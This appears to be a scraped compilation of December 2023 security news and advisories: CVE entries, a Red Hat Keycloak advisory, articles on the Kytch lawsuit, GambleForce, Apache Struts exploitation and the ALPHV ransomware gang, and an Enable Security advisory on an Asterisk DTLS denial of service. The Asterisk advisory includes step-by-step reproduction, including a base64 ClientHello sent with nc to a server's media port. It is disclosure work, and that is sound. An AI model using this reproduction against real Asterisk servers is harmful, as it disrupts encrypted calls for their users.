Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.

CVE-2023-6832

A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48049: OdZoo/exploits/website_search_blog at main · luvsn/OdZoo

Kytch, the company that tried to fix McDonald’s broken ice cream machines, has unearthed a 3-year-old email it says proves claims of an alleged plot to undermine their business.

A little over three years have passed since McDonald's sent out an email to thousands of its restaurant owners around the world that abruptly cut short the future of a three-person startup called Kytch—and with it, perhaps one of McDonald's best chances for fixing its famously out-of-order ice cream machines.

Until then, Kytch had been selling McDonald's restaurant owners a popular internet-connected gadget designed to attach to their notoriously fragile and often broken soft-serve McFlurry dispensers, manufactured by McDonalds equipment partner Taylor. The Kytch device would essentially hack into the ice cream machine's internals, monitor its operations, and send diagnostic data over the internet to an owner or manager to help keep it running. But despite Kytch's efforts to solve the Golden Arches’ intractable ice cream problems, a McDonald’s email in November 2020 warned its franchisees not to use Kytch, stating that it represented a safety hazard for staff. Kytch says its sales dried up practically overnight.

Now, after years of litigation, the ice-cream-hacking entrepreneurs have unearthed evidence that they say shows that Taylor, the soft-serve machine maker, helped engineer McDonald's Kytch-killing email—kneecapping the startup not because of any safety concern, but in a coordinated effort to undermine a potential competitor. And Taylor's alleged order, as Kytch now describes it, came all the way from the top.

Secret codes. Legal threats. Betrayal. How one couple built a device to fix McDonald’s notoriously broken soft-serve machines—and how the fast-food giant froze them out.

On Wednesday, Kytch filed a newly unredacted motion for summary adjudication in its lawsuit against Taylor for alleged trade libel, tortious interference, and other claims. The new motion, which replaces a redacted version from August, refers to internal emails Taylor released in the discovery phase of the lawsuit, which were quietly unsealed over the summer. The motion focuses in particular on one email from Timothy FitzGerald, the CEO of Taylor parent company Middleby, that appears to suggest that either Middleby or McDonald's send a communication to McDonald's franchise owners to dissuade them from using Kytch's device.

“Not sure if there is anything we can do to slow up the franchise community on the other solution,” FitzGerald wrote on October 17, 2020. “Not sure what communication from either McD or Midd can or will go out.”

In their legal filing, the Kytch cofounders, of course, interpret “the other solution” to mean their product. In fact, FitzGerald's message was sent in an email thread that included Middleby's then COO, David Brewer, who had wondered earlier whether Middleby could instead acquire Kytch. Another Middleby executive responded to FitzGerald on October 17 to write that Taylor and McDonald’s had already met the previous day to discuss sending out a message to franchisees about McDonald’s lack of support for Kytch.

But Jeremy O'Sullivan, a Kytch cofounder, claims—and Kytch argues in its legal motion—that FitzGerald’s email nonetheless proves Taylor's intent to hamstring a potential competitor. “It's the smoking gun,” O'Sullivan says of the email. “He's plotting our demise.”

Although FitzGerald's email doesn't actually order anyone to act against Kytch, the company’s motion argues that Taylor played a key role in what happened next. It's an “ambiguous yet direct message to his underlings,” argues Melissa Nelson, Kytch's other cofounder. “It's just like a mafia boss giving coded instructions to his team to whack someone."

On November 2, 2020, a little over two weeks after FitzGerald's open-ended suggestion that perhaps a “communication” from McDonald's or Middleby to franchisees could “slow up” adoption of “the other solution,” McDonald's sent out its email blast cautioning restaurant owners not to use Kytch's product.

The email stated that the Kytch gadget “allows complete access to all aspects of the equipment’s controller and confidential data”—meaning Taylor’s and McDonald’s data, not the restaurant owners’ data; that it “creates a potential very serious safety risk for the crew or technician attempting to clean or repair the machine"; and finally, that it could cause “serious human injury.” The email concluded with a warning in italics and bold: “McDonald’s strongly recommends that you remove the Kytch device from all machines and discontinue use.”

Kytch has long argued that McDonald’s safety warning was bogus: In its legal complaint, it noted that its devices received certification from Underwriters Laboratory, an independent product safety nonprofit, including meeting its safety standards. It also countered in the complaint any claim that a Kytch device's remote connection to an ice cream machine could result in the machine turning on while a person's hand was inside—in fact, Taylor's own manual advises unplugging the machine before servicing it, and removing the door of the machine to access its rotating barrels automatically disables its motor.

Kytch's legal motion now argues that FitzGerald's email reveals that the McDonald's warning to restaurant owners was never really about safety, so much as protecting its equipment partner from a startup that might represent competition. The CEO's email “essentially put into place their plan to defame us," Nelson says.

She and O’Sullivan also argue that the internal email directly contradicts FitzGerald’s public statements that Middleby hadn’t sought to kill Kytch. “We’re not in business to put other companies out of business,” FitzGerald told _The New York Times_ early last year.

When WIRED reached out to Middleby, Taylor’s parent company, for comment, a spokesperson responded in a statement disputing Kytch’s interpretation of its internal emails. “McDonald’s decided to issue the November 2020 field brief on its own accord, not at Middleby or Taylor’s direction,” the statement reads. “Taylor stood, and continues to stand, by the accuracy of statements made in the field brief.” The spokesperson also notes that Taylor won an early ruling in the lawsuit against Kytch’s request for a preliminary injunction—which would have prevented Taylor from developing a device that Kytch claims was copied from its product—and promises an upcoming filing responding to Kytch’s argument, which court documents say will happen in early 2024.

At the time of McDonald's warning email to franchisees about Kytch, Taylor was developing its own internet-connected ice cream machine, what it referred to as Taylor Shake/Sundae Connectivity, which McDonald's recommended in the same email. But, even now, more than two years after it was promised for delivery, that device has yet to arrive in restaurants—and the publicly documented ice cream headaches at McDonald’s appear to have continued. According to the website McBroken, which tracks ice cream machine downtime at McDonald's restaurants across the US, between 13 percent and 17 percent of McDonald's restaurants have had broken ice cream machines at any given time just this month. That percentage has recently been as high as 35 percent in New York City and 28 percent in Washington, DC.

Taylor declined to comment on any upcoming internet-connected ice cream machine model. But that long-touted solution to the problem has still not been made available to franchisees, according to one McDonald's restaurant owner who goes by the handle McFranchisee (and previously used the handle McD Truth) on X. But McFranchisee says that Taylor has integrated those new features into its next model, which is expected to be available in four to six months. (McFranchisee has also criticized Kytch, claiming that the startup's failure was due to its own reliability problems and an increase in its prices, not a Taylor or McDonald's conspiracy against them.)

Despite the email from Middleby's CEO that Kytch claims suggests dissuading franchisees from using Kytch's product, Kytch argues that other documents released in the lawsuit’s discovery phase show McDonald's itself was also eager to stymie Kytch from the beginning. In February 2020, Taylor president Jeremy Dobrowolski wrote in another email that “McDonald's is all hot and heavy about” Kytch's growing use in restaurants. Before the company sent out its November 2 email warning franchisees about Kytch, Taylor and McDonald’s executives had a meeting to discuss the message, and a McDonald's exec also sent a draft to Taylor for its approval. A Taylor executive wrote to others within the ice cream machine company, “I am a bit in shock they are willing to take such a strong position.”

When WIRED reached out to McDonald’s for comment on Kytch’s new argument about the “smoking gun” email from Taylor’s CEO, a spokesperson responded with a statement: “McDonald’s won’t speculate about the intent behind this email discussion that we weren't a part of. The intent of our Nov. 2020 communication was to bring awareness to potential safety concerns regarding the unapproved Kytch device.”

In addition to its lawsuit against Taylor, Kytch is still pursuing a bigger lawsuit against McDonald's itself, asking for $900 million in damages for what it describes in its legal complaint as McDonald’s effort to “drive Kytch out of the marketplace.” That lawsuit against McDonald's, if it moves forward, may soon produce more answers explaining Kytch’s legal claims that McDonald's appears to have cooperated with Taylor in telling its customers not to use Kytch—even as many of its restaurants took a significant hit from lost ice cream sales.

In the meantime, Kytch says it plans, if necessary, to take the lawsuit against Taylor to a jury trial, currently set for May. “The conspiracy described in Kytch's complaint involved folks at the highest levels of leadership, not just at Taylor but also at Middleby and at McDonald’s,” says Daniel Watkins, Kytch's attorney. “We’re really looking forward to the opportunity to present it to an open trial.”

McDonald’s Ice Cream Machine Hackers Say They Found the ‘Smoking Gun’ That Killed Their Startup

A flaw was found in Keycloak that prevents certain schemes in redirects, but permits them if a wildcard is appended to the token. This issue could allow an attacker to submit a specially crafted request leading to cross-site scripting (XSS) or further attacks. This flaw is the result of an incomplete fix for CVE-2020-10748.

Issued:

2023-12-14

Updated:

2023-12-14

**RHSA-2023:7854 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Red Hat Single Sign-On 7.6.6 security update on RHEL 7

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 7.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.  

This release of Red Hat Single Sign-On 7.6.6 on RHEL 7 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.  

Security Fix(es):  

*   keycloak: reflected XSS via wildcard in OIDC redirect\_uri (CVE-2023-6291)
*   keycloak: redirect\_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6134)
*   keycloak: offline session token DoS (CVE-2023-6563)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Single Sign-On 7.6 for RHEL 7 x86\_64

**Fixes**

*   BZ - 2249673 - CVE-2023-6134 keycloak: reflected XSS via wildcard in OIDC redirect\_uri
*   BZ - 2251407 - CVE-2023-6291 keycloak: redirect\_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts
*   BZ - 2253308 - CVE-2023-6563 keycloak: offline session token DoS

**Red Hat Single Sign-On 7.6 for RHEL 7**

SRPM

rh-sso7-keycloak-18.0.11-2.redhat\_00003.1.el7sso.src.rpm

SHA-256: ab9100a90952da5ec41b972b69c149a989dd8765cce78d6022692fa687e1b189

x86\_64

rh-sso7-keycloak-18.0.11-2.redhat\_00003.1.el7sso.noarch.rpm

SHA-256: 9fea3dac4f3695c34db3211edf8370414a2cd78ac1a64cd856af9e30da6c3c67

rh-sso7-keycloak-server-18.0.11-2.redhat\_00003.1.el7sso.noarch.rpm

SHA-256: 364c7385de072f8d935feb9dac7db6ed6dceee3799685eea65a0ac36cbed2966

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-6134

Temporary data passed between application components by Budgie Extras Clockworks applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20231127**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20231127)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is an record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-49342: CVE - CVE-2023-49342

Temporary data passed between application components by Budgie Extras Takeabreak applet could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may pre-create and control this file to present false information to users or deny access to the application and panel.

CVE-2023-49345: CVE - CVE-2023-49345

By Waqas
Yet another day, yet another threat actor posing a danger to the cybersecurity of companies globally.
This is a post from HackRead.com Read the original post: New Hacker Group GambleForce Hacks Targets with Open Source Tools

Cybersecurity researchers at Singapore-based Group-IB have unmasked EagleStrike, a subgroup of the GambleForce hacker group. They are opportunistic hackers exploiting simple vulnerabilities.

In September 2023, Group-IB’s Threat Intelligence unit discovered a command and control server hosting publicly available open-source **pentesting tools**, none being custom-made, designed for SQL injections.

The attacker was identified as “GambleForce,” who had targeted 24 organizations in government, gambling, retail, travel, and job-seeking sectors across 8 countries between September and December 2023, successfully compromising 6 websites in Australia, Indonesia, the Philippines, and South Korea. The group has also targeted websites in China, India, and Thailand.

The group uses basic yet effective techniques like SQL injections. It exploits vulnerable website content management systems (CMS) to extract user databases containing logins, hashed passwords, and tables from accessible databases.

GambleForce is not selective in its targets but collects hashed and plain text credentials. This suggests a broader motive beyond targeted attacks, possibly amassing data for future exploits or selling on the **dark web**.

The threat actors aim to exfiltrate any available information within targeted databases, such as hashed and plain text user credentials. The group’s actions with the stolen data remain unknown.

In an attack targeting Brazil, GambleForce exploited **CVE-2023-23752**, a vulnerability in the Joomla CMS, and snatched data directly from contact form submissions, showcasing their adaptability and willingness to improvise.

Further probing revealed that GambleForce uses open-source tools like dirsearch, redis-rogue-getshell, and **Tinyproxy** for directory brute-forcing, web traffic intercepting, and SQL injections to exploit vulnerabilities in database servers. Their preferred tool is sqlmap, a pentesting tool that exploits SQL injection vulnerabilities. 

Researchers also found **Cobalt Strike**, a popular pen-testing framework, on their server, showcasing commands in Chinese. It is worth noting that recently Chinese scammers have wreaked havoc by creating cloned versions of legitimate websites and redirecting visitors to gambling sites. 

In November 2023, **Hackread.com reported** about the activities of Chinese hackers in which MindaNews, a Philippine newspaper, discovered a Chinese clone of its website (mmart-inn.com) that has been illegally replicating the newspaper’s content for two years, with the most recent translation being from February 2023.

In its **blog post**, Group-IB’s Threat Intelligence wrote that its researchers shared the recent findings with its 24/7 Computer Emergency Response Team (CERT-GIB), which took down the cybercriminals’ C2 server. GambleForce is likely to regroup/rebuild its infrastructure before launching new attacks.

Nevertheless, the case goes on to show that even the most basic security gaps can have significant consequences, underscoring the need for a layered defence strategy that prioritizes patching known vulnerabilities and implementing vital security controls.

****_RELATED ARTICLES_****

1.  **Domain Squatting and Brand Hijacking: A Silent Threat**
2.  **Chinese APT Posing as Cloud Services to Spy on Cambodia**
3.  **Chinese APT spying on Vietnam military with FoundCore RAT**
4.  **Hackers attack Casino’s fish tank thermometer to obtain data**
5.  **ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store**

New Hacker Group GambleForce Hacks Targets with Open Source Tools

A recently patched Apache Struts 2 vulnerability has been spotted in worldwide exploitation attempts. Users and admins should update ASAP.

Attackers are exploiting a critical vulnerability in Apache Struts 2 that was patched recently. Struts is a very popular open source platform to develop applications and websites.

On December 7, 2023, Apache announced versions 6.3.0.2 and 2.5.33 of Struts were now available to address a potential security vulnerability listed as CVE-2023-50164.

The vulnerability affects Apache Struts versions:

*   2.0.0 through 2.5.32
*   6.0.0 through 6.3.0.1
*   2.0.0 through 2.3.37 (EOL, no longer supported)

The vulnerability that has a CVSS score of 9.8 out of 10, lies in the frameworks’ file upload functionality and can be exploited to achieve remote code execution (RCE). There is an easy to follow proof-of-concept (PoC) available, which makes it easier for cybercriminals to exploit the vulnerability.

Basically it’s a path traversal flaw that allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like ../ into file or directory paths. The flaw is caused by parameter confusion, where an attacker can first capitalize a parameter in the request and then submit an additional parameter (in lowercase) that overrides an internal file name variable. That allows an attacker to bypass the built-in check and leave the path traversal payload in the final filename.

This allows a successful attacker to plant a web shell, a malicious script used by an attacker that allows them to escalate and maintain persistent access. In this case, the attacker gets the ability to write a server-side rendered file, such as a JSP (Jakarta Server Pages) file, into a target directory. The JSP payload is executed as soon as the attacker requests the file from the server and the server is compromised. Several international organizations like the Australian Cyber Security Centre (ACSC), the French Computer Emergency Response Team (CERT-FR), and content delivery giant Akamai are warning that they are seeing active exploitation.

_Tweet by Akamai_

Because of the relative ease-of-use, we can expect to see a lot more of these attacks.

**Update now**

Users and administrators are encouraged to review the Apache Security Bulletin and upgrade to Struts 2.5.33 or Struts 6.3.0.2 or greater. There are no workarounds.

According to Apache this is a drop-in replacement and upgrade should be straightforward. The new versions can be found on the Struts download page.

Besides updating, additional measures may include:

*   Sanitization checks on uploaded file data.
*   Limit server application permissions to allowed directories.
*   Track which applications in use within your environments are using Struts frameworks.
*   On internet facing Java systems monitor for newly created files outside directories where they are expected.
*   Continue to monitor the situation and respond to new information as it comes to light.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Recently-patched Apache Struts vulnerability used in worldwide attacks 

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.

*   Fixed versions: 18.20.1, 20.5.1, 21.0.1,18.9-cert6
*   Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race
*   Vendor Security Advisory: GHSA-hxj9-xwr8-w8pq
*   Other references: CVE-2023-49786
*   Tested vulnerable versions: 20.1.0
*   Timeline:
    *   Report date: 2023-09-27
    *   Triaged: 2023-09-27
    *   Fix provided for testing: 2023-11-09
    *   Vendor release with fix: 2023-12-14
    *   Enable Security advisory: 2023-12-14

**TL;DR**

When handling DTLS-SRTP for media setup, Asterisk is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

**Description**

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)1 is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as TLS_NULL_WITH_NULL_NULL) to the port on the Asterisk server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.

This behavior was tested against Asterisk version 20.1.0, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP, STUN and DTLS messages between a UAC (the Caller) and an Asterisk server capable of handling WebRTC calls.

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to Asterisk's media port from a different IP and port, Asterisk responded by sending a DTLS Alert to the Caller. Additionally, Asterisk terminated the SIP call by sending a BYE message to the Caller.

During a real attack, the attacker would spray a vulnerable Asterisk server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.

**Impact**

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

**How to reproduce the issue**

1.  Prepare an Asterisk server with an extension configured to handle WebRTC; this may involve the following pjsip.conf and extensions.conf configuration updates:
    
    pjsip.conf
    
    \[transport-tls-nat\]
    type = transport
    protocol = wss
    bind = 172.17.0.2
    
    \[webrtc\_client\]
    type\=aor
    max\_contacts\=5
    remove\_existing\=yes
    
    \[webrtc\_client\]
    type\=auth
    auth\_type\=userpass
    username\=3456
    password\=3456
    
    \[3456\]
    type\=endpoint
    aors\=webrtc\_client
    auth\=webrtc\_client
    dtls\_auto\_generate\_cert\=yes
    webrtc\=yes
    context\=default
    disallow\=all
    allow\=opus,ulaw
    
    extensions.conf
    
    \[globals\]
    
    \[default\]
    exten = \_XXXX,1,Verbose(1, "User ${CALLERID(num)} dialed ${EXTEN}.")
    	same => n,Playback(demo-congrats)
    	same => n,Hangup()
    
2.  Send an INVITE message to the target server with WebRTC SDP:
    
        INVITE sip:1000@192.168.1.202 SIP/2.0
        Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-4RHtimOzaIkHeUDU
        Max-Forwards: 70
        From: <sip:3456@192.168.1.202>;tag=cnbsc3nNX2ydugl4
        To: <sip:1000@192.168.1.202>
        Contact: <sip:3456@192.168.1.202>
        Call-ID: VaglTzNRBSuvPPdw
        CSeq: 5 INVITE
        Content-Type: application/sdp
        Content-Length: 563
        
        v=0
        o=- 1695296401 1695296401 IN IP4 192.168.1.202
        s=-
        t=0 0
        c=IN IP4 192.168.1.202
        m=audio 36866 UDP/TLS/RTP/SAVPF 0 8 101
        a=setup:active
        a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3
        a=rtpmap:0 PCMU/8000/1
        a=rtpmap:8 PCMA/8000/1
        a=rtpmap:101 telephone-event/8000
        a=ice-ufrag:IOZyOSQkVywevryI
        a=ice-pwd:UQUtRMZKFERnmZqQdaggFzJBhcWVxabr
        a=candidate:6249488300 1 udp 2130706431 192.168.1.202 36866 typ host generation 0
        a=end-of-candidates
        a=rtcp-mux
        a=rtcprsize
        a=sendrecv
        
        
    
3.  Note Asterisk's media port and IP values, which will be used as the <asterisk-ip> and <media-port> parameters by the Attacker
    
4.  When the call has been established, send a STUN binding request which has the appropriate Username, Message-Integrity and Ice-Controlled properties
    
5.  When the Binding Success Response message is received, send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the Asterisk server
    
    CLIENT\_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" 
    CLIENT\_HELLO="${CLIENT\_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"
    CLIENT\_HELLO="${CLIENT\_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"
    CLIENT\_HELLO="${CLIENT\_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"
    CLIENT\_HELLO="${CLIENT\_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="
    echo -n "${CLIENT\_HELLO}" | base64 --decode | nc -u <asterisk-ip\> <media-port\>
    
6.  Observe that the Caller receives a DTLS Alert message and a SIP BYE message on its signaling channel
    

Note that the above steps are used to reliably reproduce the vulnerability. In the case of a real attack, the attacker simply has to spray the Asterisk server with DTLS messages.

**Solution and recommendations**

To address this vulnerability, upgrade Asterisk to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

**About Enable Security**

Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

**Disclaimer**

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

**Disclosure policy**

This report is subject to Enable Security's vulnerability disclosure policy which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy.

1.  Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764 ↩

CVE-2023-49786: Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation

The ALPHV ransomware group appears to be going through some things.

The ALPHV ransomware gang, arguably the second most dangerous “big game” ransomware operator, appears to be back in business after its infrastructure went down for five days. But all does not appear to be going well for group.

ALPHV’s dark web leak site may be back but it is only showing a single victim with no sign of any of the hundreds of others it normally lists. The solitary listing on the site is dated December 13, which is after the site was restored.

Many of the group’s negotiation links are reportedly not working either, meaning that victims looking to pay off the gang are stuck in limbo, and its likely that neither the ALPHV group, nor the affiliates who use its ransomware to carry out attacks, are being paid.

The ALPHV leak site currently lists a single victimcreenshot

When the gang’s infrastructure went down a week ago, many suspected the hand of law enforcement, despite no official word on the subject. According to VX Underground, APLHV’s own explanation is that it suffered a hardware failure. If the group really has lost access to the data its business relies on, then it’s now getting a first hand look at what its victims go through when they’re attacked and their data is encrypted.

ALPHV wouldn’t be the first ransomware gang to suffer problems behind the scenes. Earlier this year, Analyst1 reported that LockBit, the 800-lb gorilla in the ransomware space “cannot consistently publish stolen data … due to limitations in its backend infrastructure and available bandwidth.”

However, while it’s perfectly plausible that ALPHV is suffering hardware woes, law enforcement action can’t be ruled out. ALPHV would likely lose affiliates if it admitted to a brush with the law, so the ransomware gang is likely going to attribute the outage to something benign—whether that is true or not. Equally, the silence from the FBI could mean everything and nothing. In January, the agency took down one of ALPHV’s contemporaries, Hive, and revealed it had penetrated the group’s infrastructure six months prior:

> Since late July 2022, the FBI has penetrated Hive’s computer networks, captured its decryption keys, and offered them to victims worldwide, preventing victims from having to pay $130 million in ransom demanded. Since infiltrating Hive’s network in July 2022, the FBI has provided over 300 decryption keys to Hive victims who were under attack. In addition, the FBI distributed over 1,000 additional decryption keys to previous Hive victims.

There were infiltration rumors about LockBit later in the year too, after it went inexplicably dark for two weeks. Analyst1’s undercover investigator revealed they had “received another message from a third party who indicated they may have hacked the gang’s infrastructure … I believe the gang went dark to clean up the intrusion into its infrastructure.”

Analyst1 didn’t say whether the third party that claimed to have hacked LockBit was a law enforcement agency, a criminal hacker, or another ransomware gang, but all are possible—there is no honor among thieves.

ALPHV would certainly be of great interest to both law enforcement and its rivals. Over the last 18 months it has been the second most dangerous ransomware group in the world, listing more victims on its leak site than every other group apart from LockBit.

The five most active ransomware groups by known attacks over the last 18 months.

The number of known monthly attacks by the group has increased steadily over the last 18 months, too.

Known ransomware attacks per month by ALPHV

Even if another ransomware gang isn’t behind ALPHV’s woes, one of them is certainly looking to profit from it.

Bleeping Computer reports that LockBit has been attempting to recruit affiliates from ALPHV. The gang is reportedly offering the use of its data leak site and negotiation panel to ALPHV affiliates so they can resume negotiations with victims that have been disrupted. At least one victim previously listed on the ALPHV site is now listed on the LockBit site.

Whether ALPHV’s troubles are caused by tight-lipped law enforcement, an ironic lack of disaster recovery planning, or some other sleight of hand, any disruption to the ransomware ecosystem is a welcome early Christmas present in our book.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Tag

#web